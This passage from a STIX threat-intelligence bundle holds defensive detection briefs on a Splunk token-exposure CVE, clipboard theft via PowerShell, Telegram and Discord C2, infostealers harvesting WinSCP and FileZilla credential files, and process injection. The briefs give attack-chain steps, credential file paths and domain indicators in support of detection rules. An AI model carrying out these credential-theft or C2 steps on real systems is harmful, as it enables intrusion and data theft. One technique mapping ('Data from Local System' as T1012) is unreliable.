`splunkd` debug logs are stored.\n3.  **Identify Token Exposure:** The attacker searches through the `splunkd` logs for entries originating from the `JsonWebToken` component at `DEBUG` log level, specifically looking for messages like \"Validating token:\".\n4.  **Extract JWT:** The attacker parses the identified log entries to extract the full JSON Web Token (JWT) value, which contains authentication credentials.\n5.  **Token Replay/Impersonation:** The extracted JWT is then used to craft authenticated API requests or session cookies, allowing the attacker to impersonate the legitimate user whose token was exposed.\n6.  **Unauthorized Access to Splunk:** The attacker gains unauthorized access to the Splunk user's account, bypassing normal authentication processes.\n7.  **Data Exfiltration/Privilege Escalation:** With compromised access, the attacker can then exfiltrate sensitive data stored or processed by Splunk, create new users, modify configurations, or escalate privileges within the Splunk environment.\n8.  **Full Compromise:** Ultimately, the attacker may achieve full control over the Splunk deployment, leveraging its capabilities for further reconnaissance, lateral movement, or destruction of data.\n\n## Impact\n\nThe impact of CVE-2024-29945 is severe, as exposed authentication tokens can serve as direct access keys to a Splunk environment. If successfully exploited, attackers can gain unauthorized access to all data and functionalities accessible by the compromised token's legitimate owner, potentially leading to sensitive data exfiltration, system tampering, and privilege escalation. While specific victim counts are not publicly disclosed, this vulnerability affects widely deployed Splunk Enterprise and Splunk Cloud instances across all sectors. Organizations using affected versions face risks including compliance violations due to data breaches, operational disruption, and significant reputational damage. The ability to bypass authentication can compromise the integrity and confidentiality of an organization's critical monitoring and security intelligence platform.\n\n## Recommendation\n\n*   **Patch CVE-2024-29945 immediately:** Update Splunk Enterprise to versions 9.2.1, 9.1.4, 9.0.9, or later to address CVE-2024-29945, which mitigates the token exposure in debug logs.\n*   **Deploy the provided Sigma rule:** Implement the \"Detect Splunk Authentication Token Exposure in Debug Logs\" Sigma rule in your SIEM to identify instances where JWTs are logged in plain text within `splunkd` debug logs.\n*   **Configure Splunk logging:** Review and adjust Splunk logging configurations to ensure `JsonWebToken` component logging is not set to `DEBUG` level in production environments unless absolutely necessary for troubleshooting.\n*   **Monitor internal Splunk logs:** Routinely monitor Splunk internal logs (`_internal` index) for the behavior described in the \"Detect Splunk Authentication Token Exposure in Debug Logs\" rule, specifically for events containing `Validating token:` from the `JsonWebToken` component.\n",
      "published": "2026-07-03T13:37:02Z",
      "labels": [
        "splunk",
        "vulnerability",
        "token-exposure",
        "log-analysis",
        "application"
      ],
      "object_refs": [
        "attack-pattern--c2f89670-b525-5d7c-8cff-4928a722d585"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://advisory.splunk.com/advisories/SVD-2024-0301"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5ba5170e-7f12-5f27-8d91-17eea9d52359",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Cisco Security Updates — July 2026",
      "description": "## Overview\n\nAggregated Cisco security advisories for July 2026. CVEs from this cycle are folded\ninto the list below as they are published.\n\n## Recommendation\n\nReview affected products and apply Cisco's July 2026 security updates.\n",
      "published": "2026-07-03T13:36:20Z",
      "labels": [
        "roundup"
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--903c407f-69d2-574a-8a5d-526826a282d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Clipboard Data",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1115",
          "url": "https://attack.mitre.org/techniques/T1115"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--edcc5793-cfc0-5b46-a7e7-0ad6723a131c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f35d3605-bdff-5ab2-8ef8-f0c4b7d4d1ba",
      "target_ref": "attack-pattern--903c407f-69d2-574a-8a5d-526826a282d3"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f35d3605-bdff-5ab2-8ef8-f0c4b7d4d1ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of PowerShell Get-Clipboard for Data Collection",
      "description": "## Overview\n\nThis threat brief focuses on the detection of the PowerShell commandlet `Get-Clipboard` being executed on Windows endpoints. This technique is commonly employed by adversaries in the post-exploitation phase to collect sensitive data that users may have recently copied to their clipboard, including usernames, passwords, API keys, or other confidential information. Detection relies on PowerShell Script Block Logging (EventCode 4104), which records the execution of PowerShell commands and scripts. The presence of `Get-Clipboard` in these logs is a strong indicator of attempted information theft. While the source does not detail a specific campaign, the technique is a fundamental component of various malware families, including those like Prestige Ransomware and BlankGrabber Stealer, which aim to exfiltrate valuable data from compromised systems. Detecting this activity is crucial for identifying data collection efforts before sensitive information can be fully exfiltrated and misused.\n\n## Attack Chain\n\n1.  **Initial Access**: An adversary typically gains initial access to a target system through common vectors such as spearphishing with a malicious attachment, exploitation of a public-facing application vulnerability, or supply chain compromise.\n2.  **Execution**: Following initial access, the adversary executes a payload, often a script or malware, on the victim's machine to establish a foothold and begin operations. This payload might be delivered via a legitimate process or a malicious downloader.\n3.  **Persistence**: To maintain access to the compromised system, the adversary establishes persistence mechanisms, such as modifying registry run keys, creating scheduled tasks, or installing malicious services.\n4.  **Discovery**: The attacker performs internal reconnaissance, using tools or scripts to gather information about the compromised system, network configuration, and user activities, identifying potential sources of valuable data.\n5.  **Collection - Clipboard Data**: During the collection phase, the adversary executes the `Get-Clipboard` PowerShell commandlet on the compromised endpoint. This command retrieves the current content of the Windows clipboard, which can contain sensitive user data like credentials, payment information, or PII.\n6.  **Command and Control**: The collected clipboard data, potentially after encoding or encryption, is then exfiltrated from the compromised host to an attacker-controlled command and control (C2) server over various protocols (e.g., HTTP, DNS).\n7.  **Impact**: The exfiltrated clipboard data is analyzed by the attacker. This information can be used for further system compromise, account takeover across other services, lateral movement within the network, or direct financial fraud.\n\n## Impact\n\nSuccessful exploitation of this technique can lead to severe data breaches, encompassing the theft of sensitive credentials, personally identifiable information (PII), or proprietary corporate data. While the brief does not specify a victim count or particular sectors, `Get-Clipboard` is a generalized tactic applicable across all industries. The immediate impact is the compromise of information that was temporarily stored in the clipboard, which could directly facilitate unauthorized access to user accounts, internal systems, or even lead to financial losses if payment card information or banking credentials are exfiltrated. Long-term consequences include reputational damage, regulatory fines, and extensive remediation costs.\n\n## Recommendation\n\n*   Enable PowerShell Script Block Logging (EventCode 4104) on all Windows endpoints to ensure the necessary telemetry for detection. Refer to the `how_to_implement` section in the source for guidance.\n*   Deploy the provided Sigma rule \"Detect PowerShell Get-Clipboard Execution\" to your SIEM and tune it for your environment to detect `Get-Clipboard` usage.\n*   Implement security awareness training for users, emphasizing the risks of copying sensitive information (like passwords) to the clipboard, especially in untrusted environments.\n",
      "published": "2026-07-03T13:35:19Z",
      "labels": [
        "collection",
        "endpoint",
        "powershell",
        "data-theft",
        "post-exploitation"
      ],
      "object_refs": [
        "attack-pattern--903c407f-69d2-574a-8a5d-526826a282d3"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1115/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_clipboard_data_via_get_clipboard.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dd0ec17c-446b-5d74-bb7b-6cce4f0fac7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.telegram.org",
      "pattern": "[domain-name:value = 'api.telegram.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T13:28:22Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--09be2801-d934-570f-bb0d-4747bade5b4b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ce9d3b42-e190-5fbd-8e9d-1f31272f7637",
      "target_ref": "indicator--dd0ec17c-446b-5d74-bb7b-6cce4f0fac7c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--703b86cb-5179-57c3-bfef-3c3c9178cd96",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ce9d3b42-e190-5fbd-8e9d-1f31272f7637",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1102",
          "url": "https://attack.mitre.org/techniques/T1102"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--90ab6b25-ecd4-5119-9cce-4910c51ea367",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ce9d3b42-e190-5fbd-8e9d-1f31272f7637",
      "target_ref": "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ce9d3b42-e190-5fbd-8e9d-1f31272f7637",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows DNS Query to Telegram Bot API Indicating Malware C2",
      "description": "## Overview\n\nThis intelligence describes a detection opportunity for malicious activity on Windows endpoints where processes other than the legitimate Telegram client attempt to resolve `api.telegram.org`. This domain is the primary endpoint for the Telegram Bot API, which is frequently abused by various malware families for command and control (C2) communications. By monitoring for these specific DNS queries, security teams can identify potential covert communication channels established by malware on compromised systems. This technique allows attackers to send commands to compromised machines, receive exfiltrated data, or maintain persistence, bypassing traditional firewall rules that might block direct C2 traffic to unknown IP addresses but permit access to legitimate cloud services. The detection logic specifically targets `Sysmon Event ID 22` (DNS Query) and excludes `telegram.exe` to reduce false positives.\n\n## Impact\n\nIf this activity goes undetected, it indicates that a system within the network is likely compromised by malware leveraging the Telegram Bot API for C2. The successful establishment of this communication channel allows attackers to maintain control over the compromised endpoint. This can lead to further stages of the attack chain, including data exfiltration, deployment of additional malicious payloads (such as ransomware or crypto-miners), remote execution of commands, or lateral movement within the network. The observed damage typically includes data theft, system manipulation, and potential financial losses for the affected organization.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Windows DNS Query to Telegram Bot API by Non-Telegram Process\" to your SIEM and tune for your environment.\n*   Ensure Sysmon Event ID 22 (DNS Query) logging is enabled and ingested into your security monitoring platform to activate the rule above.\n*   Consider blocking or strictly monitoring `api.telegram.org` at the network perimeter (DNS resolver, proxy) for all systems not explicitly authorized to use the Telegram Bot API, as listed in the IOC table.\n",
      "published": "2026-07-03T13:28:22Z",
      "labels": [
        "network",
        "command-and-control",
        "c2",
        "telegram",
        "windows",
        "malware"
      ],
      "object_refs": [
        "indicator--dd0ec17c-446b-5d74-bb7b-6cce4f0fac7c",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/network/windows_dns_query_request_by_telegram_bot_api.yml"
        },
        {
          "source_name": "reference",
          "url": "https://www.splunk.com/en_us/blog/security/threat-advisory-telegram-crypto-botnet-strt-ta01.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7432b603-1de7-5a1e-9395-a8f8c63c268b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: discord.com",
      "pattern": "[domain-name:value = 'discord.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T13:27:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ce1a5499-9496-52ef-b6a8-d3f22d8c2ea3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ad28e773-dbb2-5a7c-b41a-99ce465a1d3a",
      "target_ref": "indicator--7432b603-1de7-5a1e-9395-a8f8c63c268b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--44579c35-a43e-5acb-9535-87c342f33a70",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: cdn.discordapp.com",
      "pattern": "[domain-name:value = 'cdn.discordapp.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T13:27:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e166f7dc-ffc5-59b2-be1b-ab74519101a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ad28e773-dbb2-5a7c-b41a-99ce465a1d3a",
      "target_ref": "indicator--44579c35-a43e-5acb-9535-87c342f33a70"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--171ddb37-9229-50d5-a4a6-560c81ca89bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ad28e773-dbb2-5a7c-b41a-99ce465a1d3a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ad28e773-dbb2-5a7c-b41a-99ce465a1d3a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Process DNS Queries to Discord",
      "description": "## Overview\n\nThis threat brief focuses on detecting anomalous network activity where a suspicious process, not associated with the legitimate Discord application, performs DNS queries to Discord-related domains. This behavior is a key indicator of potential malicious activity, as adversaries frequently abuse legitimate services like Discord's content delivery network (CDN) to host and distribute malware payloads. A notable example is the WhisperGate campaign, which leveraged Discord for malicious file hosting. The detection relies on Sysmon Event ID 22 logs, specifically looking for DNS queries containing \"discord\" in the query name originating from processes outside of known legitimate Discord application paths (e.g., `AppData\\Local\\Discord`, `Program Files`). If confirmed malicious, this activity strongly suggests an attempt by malware to retrieve secondary stages or tools, ultimately aiming for further compromise and impact on the affected system.\n\n## Attack Chain\n\n1.  An attacker achieves initial execution of a malicious payload on a target system, often disguised as a legitimate application or delivered via social engineering.\n2.  The malicious process, now running on the victim machine, attempts to resolve a domain hosted on Discord's infrastructure via a DNS query (Sysmon Event ID 22).\n3.  The DNS query successfully resolves, providing the attacker's malware with the IP address of a Discord-hosted resource (e.g., a file on Discord's CDN).\n4.  The malicious process initiates a connection to the resolved Discord IP address and downloads additional malicious components or secondary stage payloads.\n5.  The newly downloaded payloads are executed, leading to further malicious activities such as establishing persistence, escalating privileges, or deploying additional tools.\n6.  The attacker achieves their final objective, which may include data exfiltration, system damage (as in data destruction campaigns like WhisperGate), or deploying ransomware, resulting in system compromise.\n\n## Impact\n\nThe successful execution of malware leveraging Discord for C2 or payload delivery can lead to significant consequences, ranging from data exfiltration and credential theft to complete system compromise or data destruction. Campaigns like WhisperGate, which exploited such methods, demonstrated the potential for widespread data wiping across targeted organizations. While this detection doesn't specify victim counts, the technique is widely applicable, making it a threat to any organization where endpoints are not adequately monitored for anomalous network connections or where Discord usage is not strictly controlled or egress filtered.\n\n## Recommendation\n\n*   Enable Sysmon process-creation and DNS query logging (Event ID 22) on all Windows endpoints to facilitate the detection of suspicious processes making Discord DNS queries.\n*   Deploy the Sigma rule \"Suspicious Process With Discord DNS Query\" to your SIEM and tune it for your environment, specifically by identifying and allowlisting any legitimate, non-Discord applications that may legitimately query Discord domains (e.g., specific gaming clients or bots).\n*   Monitor for network connections and DNS queries to `*discord*` domains originating from processes other than the official Discord client, investigating any anomalous activity immediately.\n",
      "published": "2026-07-03T13:27:23Z",
      "labels": [
        "malware",
        "c2",
        "initial-access",
        "execution",
        "windows"
      ],
      "object_refs": [
        "indicator--7432b603-1de7-5a1e-9395-a8f8c63c268b",
        "indicator--44579c35-a43e-5acb-9535-87c342f33a70",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
        },
        {
          "source_name": "reference",
          "url": "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b55f6900-6bd0-5e68-b7ee-0c02a34ad9fe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--67d067c5-78bc-58f0-9c6a-e93ddce4be4e",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--67d067c5-78bc-58f0-9c6a-e93ddce4be4e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "WinSCP Credential Access by Information Stealers",
      "description": "## Overview\n\nThis brief details the threat of information-stealing malware, exemplified by families like Phantom Stealer, targeting the WinSCP client's sensitive configuration files. WinSCP, a popular open-source SFTP, FTP, WebDAV, SCP, and S3 client for Windows, stores SSH and FTP session credentials, including passwords and private key references, within the user profile path `C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Martin Prikryl\\WinSCP 2\\Configuration\\Security`. Malicious actors leverage infostealers to programmatically access these files, bypassing WinSCP's native protection mechanisms and directly extracting stored credentials. This activity is considered highly suspicious, as legitimate access to this directory should primarily originate from the `winscp.exe` process itself. Detection relies on monitoring Windows Security Event 4663 (Object Access) for unauthorized processes reading or modifying files within this critical security folder.\n\n## Attack Chain\n\n1.  Initial compromise of an endpoint occurs, typically via phishing or drive-by download, leading to the execution of information-stealing malware (e.g., Phantom Stealer).\n2.  The deployed malware performs reconnaissance on the compromised system to identify installed applications commonly used for sensitive data storage, such as WinSCP.\n3.  The malware locates the WinSCP security configuration folder, usually found at `%APPDATA%\\Martin Prikryl\\WinSCP 2\\Configuration\\Security\\`.\n4.  The malware attempts to access and read files within this directory using a process other than `winscp.exe`, triggering Windows Security Event 4663 for object access.\n5.  Sensitive SSH and FTP credentials, including plaintext passwords and private key references, are extracted from the configuration files.\n6.  The harvested credentials are then staged for exfiltration to the attacker's command and control (C2) infrastructure, enabling further malicious activity like lateral movement or access to external services.\n\n## Impact\n\nSuccessful credential theft from WinSCP configurations can lead to significant follow-on attacks. Attackers can gain unauthorized access to remote servers (via SSH or FTP), cloud environments, or other critical infrastructure connected through WinSCP. This provides opportunities for data exfiltration, deployment of ransomware, or establishment of persistent access within the victim's network. Organizations may face severe financial losses, reputational damage, regulatory fines, and extensive remediation efforts due to expanded breaches facilitated by these stolen credentials. While a specific victim count is not provided, credential theft is a common tactic across all sectors.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious WinSCP credential access.\n*   Enable Windows Security Event 4663 logging for \"Audit Object Access\" in Group Policy, specifically for success and failure events on file system objects, to capture relevant activity.\n*   Investigate all alerts generated by the `Detect WinSCP Security Configuration Access by Non-WinSCP Process` rule, focusing on the accessing process, its parent, and any associated network connections.\n*   Educate users on the risks of phishing and social engineering to prevent initial malware delivery that facilitates credential theft.\n",
      "published": "2026-07-03T13:26:15Z",
      "labels": [
        "credential-theft",
        "infostealer",
        "windows",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_winscp_configuration_security_access.yml"
        },
        {
          "source_name": "reference",
          "url": "https://malpedia.caad.fkie.fraunhofer.de/details/win.phantom_stealer"
        },
        {
          "source_name": "reference",
          "url": "https://www.proofpoint.com/us/blog/threat-insight/not-safe-work-tracking-and-investigating-stealerium-and-phantom-infostealers"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e7f39b17-f7ee-565a-a9f9-7660eab43fa1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--aaeea84e-d25e-55f1-9373-6258e3dbb6f1",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--aaeea84e-d25e-55f1-9373-6258e3dbb6f1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unusual FileZilla XML Configuration File Access",
      "description": "## Overview\n\nThis intelligence brief focuses on detecting suspicious access patterns to FileZilla FTP client's sensitive XML configuration files on Windows systems. Threat actors often target these files, such as `recentservers.xml` and `sitemanager.xml`, because they can contain stored credentials, server connection details, and historical session information. The detection specifically identifies instances where processes other than the legitimate `filezilla.exe` or `onedrive.exe` attempt to read or modify these critical files. Such activity is highly indicative of post-exploitation credential access or data exfiltration attempts by malicious software, including stealers like Quasar RAT or Phantom Stealer, seeking to harvest valuable data. Early detection of this behavior is crucial for preventing broader network compromise and mitigating the risk of sensitive data exposure.\n\n## Attack Chain\n\n(No attack chain is provided as the source describes a detection technique for post-exploitation behavior, not a full end-to-end attack narrative from initial access.)\n\n## Impact\n\nIf this activity goes undetected, it can lead to severe consequences for an organization. Attackers can exfiltrate credentials stored in FileZilla's configuration files, granting them unauthorized access to FTP servers and potentially other network resources. This credential theft can facilitate lateral movement within the network, further data exfiltration from sensitive servers, or the delivery of additional malware. The compromise of FTP accounts can also lead to website defacement or disruption of services, impacting business operations and reputation.\n\n## Recommendation\n\n*   Enable \"Audit Object Access\" for both \"Success\" and \"Failure\" on Windows Group Policy and ensure Windows Security Event Log 4663 is collected, as required for the detection rule.\n*   Deploy the `Detect Unusual FileZilla XML Config Access` Sigma rule to your SIEM and tune it for your environment, specifically by whitelisting any legitimate third-party applications that are known to access FileZilla configuration files.\n*   Regularly review alerts generated by the `Detect Unusual FileZilla XML Config Access` rule, investigating the `ProcessName` and `Caller_User_Name` of any unauthorized access attempts.\n",
      "published": "2026-07-03T13:24:43Z",
      "labels": [
        "windows",
        "credential-access",
        "ftp-client"
      ],
      "object_refs": [
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.trendmicro.com/en_us/research/18/k/trickbot-shows-off-new-trick-password-grabber-module.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Process Injection",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1055",
          "url": "https://attack.mitre.org/techniques/T1055"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--33ca47c2-95c8-5687-861c-cc56e4c2e82f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--da57be89-dfb5-539c-8622-86b55c105507",
      "target_ref": "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--da57be89-dfb5-539c-8622-86b55c105507",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Process Injection With Public Source Path",
      "description": "## Overview\n\nThis brief details a detection strategy for Windows process injection via `CreateRemoteThread` (Sysmon Event ID 8), a critical technique for defense evasion and privilege escalation. Adversaries utilize this method to execute arbitrary code within another process, often originating from non-standard system directories. This activity is indicative of advanced malware operations, including those associated with tools like Brute Ratel C4, Earth Alux, and Phantom Stealer. Detection focuses on identifying processes not originating from `C:\\Windows\\` or `C:\\Program Files\\` directories attempting to create remote threads, as this unusual behavior frequently signals malicious intent. Timely detection is crucial to prevent unauthorized code execution, data exfiltration, or further system compromise.\n\n## Impact\n\nSuccessful process injection, as detected by this analytic, enables adversaries to execute arbitrary code within the context of a legitimate process, making detection and forensic analysis more challenging. This can lead to significant impacts such as full system compromise, data exfiltration, and the establishment of persistent backdoors. Tools like Brute Ratel C4, known for their stealth and sophisticated capabilities, can leverage such techniques to maintain control and bypass security controls, ultimately facilitating further malicious activities and severe damage to an organization's infrastructure.\n\n## Recommendation\n\n* Enable Sysmon Event ID 8 logging on all Windows endpoints to capture `CreateRemoteThread` operations, which is the foundational log source for this detection.\n* Deploy the Sigma rule `Detect Windows Process Injection via CreateRemoteThread from Non-Standard Paths` provided in this brief to your SIEM and tune for your environment.\n* Implement careful tuning by reviewing false positives identified by the `Detect Windows Process Injection via CreateRemoteThread from Non-Standard Paths` rule, specifically allowing known legitimate security tools or third-party applications that use `CreateRemoteThread` from non-standard directories.\n",
      "published": "2026-07-03T13:22:46Z",
      "labels": [
        "endpoint",
        "process-injection",
        "defense-evasion",
        "privilege-escalation",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d6d49666-f5b0-56e6-9585-bdb9b4d2abeb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--28609aa9-41f4-5808-b38d-efc7d06ec75c",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--da26685a-06ae-5445-a6a5-2e777dbba577",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1012",
          "url": "https://attack.mitre.org/techniques/T1012"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1fdc2096-7d00-5286-8fd3-7155f959b17f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--28609aa9-41f4-5808-b38d-efc7d06ec75c",
      "target_ref": "attack-pattern--da26685a-06ae-5445-a6a5-2e777dbba577"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--28609aa9-41f4-5808-b38d-efc7d06ec75c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Non-Discord Application Accessing Discord LevelDB",
